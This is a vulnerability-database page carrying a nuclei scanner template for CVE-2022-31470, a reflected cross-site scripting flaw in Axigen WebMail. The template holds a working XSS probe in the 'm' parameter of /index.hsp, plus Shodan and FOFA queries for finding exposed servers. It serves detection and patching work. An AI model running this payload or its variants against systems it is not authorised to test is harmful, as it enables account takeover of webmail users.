Lucene search
K

Axigen WebMail - Cross-Site Scripting

šŸ—“ļøĀ 03 Jul 2026Ā 13:39:16Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 20Ā Views

Axigen WebMail is vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS Vulnerability
11 Sep 202300:00
–zdt
GithubExploit
Exploit for Cross-site Scripting in Axigen Axigen_Mobile_Webmail
13 Sep 202305:59
–githubexploit
ATTACKERKB
CVE-2022-31470
7 Jun 202221:15
–attackerkb
Circl
CVE-2022-31470
8 Jun 202200:31
–circl
CNNVD
Axigen Mobile WebMail č·Øē«™č„šęœ¬ę¼ę“ž
7 Jun 202200:00
–cnnvd
CVE
CVE-2022-31470
7 Jun 202200:00
–cve
Cvelist
CVE-2022-31470
7 Jun 202200:00
–cvelist
Exploit DB
Axigen &lt; 10.3.3.47, 10.2.3.12 - Reflected XSS
8 Sep 202300:00
–exploitdb
NVD
CVE-2022-31470
7 Jun 202221:15
–nvd
OSV
CVE-2022-31470
7 Jun 202221:15
–osv
Rows per page
id: CVE-2022-31470

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: AmirZargham
  severity: medium
  description: |
    Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
  impact: |
    Attackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account.
  remediation: |
    Update Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m parameter.
  reference:
    - https://www.axigen.com/
    - https://www.exploit-db.com/exploits/51722
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31470
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-31470
    cwe-id: CWE-79
    epss-score: 0.52088
    epss-percentile: 0.98825
    cpe: cpe:2.3:a:axigen:webmail:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: axigen
    product: webmail
    shodan-query: title:"Axigen"
    fofa-query: title="Axigen"
  tags: cve,cve2022,axigen,webmail,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "Axigen WebMail"
          - 'AXI-SCRIPT'
          - 'axigen-web-fonts'
          - 'AXIWMRememberLogin'
        internal: true
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/index.hsp?m=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d4ce00569b8b39670c68e1c9df2014126d6a59c2545c6b6e4252f2bd765ef52102203ba0df2ae7e8c2bf39d8a0887a4e8104340f57d9c2f3dc87432875c4c083ab9d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.52088
20